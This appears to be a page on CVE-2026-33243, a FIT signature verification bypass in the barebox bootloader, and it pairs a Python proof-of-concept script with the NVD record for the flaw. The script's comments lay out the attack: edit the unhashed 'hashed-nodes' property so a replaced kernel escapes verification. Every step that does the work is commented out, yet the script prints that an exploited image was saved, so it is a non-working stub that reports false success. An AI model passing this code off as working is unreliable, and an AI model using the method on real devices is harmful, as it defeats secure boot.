CVE-2026-33243

#!/usr/bin/env python3 # PoC for CVE-2026-33243: Modifying hashed-nodes in FIT image # This script demonstrates how to manipulate the FIT image structure. # Requires pylibfdt or similar library to handle device trees. import sys def exploit_fit_image(fit_image_path, output_path): """ Exploit the FIT signature verification bypass by modifying hashed-nodes. """ print(f"[*] Loading FIT image from {fit_image_path}") # In a real scenario, use fdt_open or similar to parse the DTB # fdt = fdt_open(fit_image_path) # Locate the signature node # signature_node = fdt.path_offset("/configurations/conf-1/signature") # Modify the 'hashed-nodes' property to exclude the malicious kernel node # Original hashed-nodes might list "kernel@1", "fdt@1" # Attacker changes it to only reference "fdt@1" (assuming kernel is replaced) # fdt.setprop_string(signature_node, "hashed-nodes", "fdt@1") # Save the modified FIT image # with open(output_path, 'wb') as f: # f.write(fdt.as_bytearray()) print(f"[!] Exploited FIT image saved to {output_path}") print("[!] The bootloader may now skip verification of the modified kernel.") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python3 exploit.py <input_fit.itb> <output_fit.itb>") sys.exit(1) exploit_fit_image(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2026-33243", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:47.167", "lastModified": "2026-03-26T21:17:05.430", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "barebox is a bootloader. In barebox from version 2016.03.0 to before version 2026.03.1 (and the corresponding backport to 2025.09.3), an attacker could exploit a FIT signature verification vulnerability to trick the bootloader into booting different images than those that were verified as part of a signed configuration. mkimage(1) sets the hashed-nodes property of the FIT signature node to list which nodes of the FIT were hashed as part of the signing process as these will need to be verified later on by the bootloader. However, hashed-nodes itself is not part of the hash and could therefore be modified to allow booting different images than those that have been verified. This issue has been patched in barebox versions 2026.03.1 and backported to 2025.09.3."}, {"lang": "es", "value": "barebox es un gestor de arranque. En barebox desde la versión 2016.03.0 hasta antes de la versión 2025.09.3 y desde la versión 2025.10.0 hasta antes de la versión 2026.03.1, al crear un FIT, mkimage(1) establece la propiedad hashed-nodes del nodo de firma FIT para listar qué nodos del FIT fueron hasheados como parte del proceso de firma, ya que estos deberán ser verificados posteriormente por el gestor de arranque. Sin embargo, hashed-nodes en sí mismo no forma parte del hash y por lo tanto puede ser modificado por un atacante para engañar al gestor de arranque para que arranque imágenes diferentes a las que han sido verificadas. Este problema ha sido parcheado en las versiones de barebox 2025.09.3 y 2026.03.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:denx:u-boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "2013.07", "versionEndExcluding": "2026.04", "matchCriteriaId": "73526136-D89A-4F96-AB26-FE78052494BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc1:*:*:*:*:*:*", "matchCriteriaId": "39D97BA6-0B7B-4633-971E-3C79C58A57A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc2:*:*:*:*:*:*", "matchCriteriaId": "94B93B6C-02D1-42C9-B862-C945511A0297"}, {"vulnerable": true, "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc3:*:*:*:*:*:*", "matchCriteriaId": "86FAEAE1-FCD8-426D-9452-E1885014C9A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pengutronix:barebox:*:*:*:*:*:*:*:*", "versionStartIncluding": "2016.03.0", "versionEndExcluding": "2025.09.3", "matchCriteriaId": "F9C10736-4F83-4DFE-B39D-8F93E6C8D55D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pengutronix:barebox:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.10.0", "versionEndExcluding": "2026.03.1", "matchCriteriaId": "D19A8826-6289-4EEA-8093-8F92E7A66461"}]}]}], "references": [{"url": "https://github.com/barebox/barebox/commit/aca01795056d51060cb096f9a1ea309361743e05", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/barebox/barebox/security/advisories/GHSA-3fvj-q26p-j6h4", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}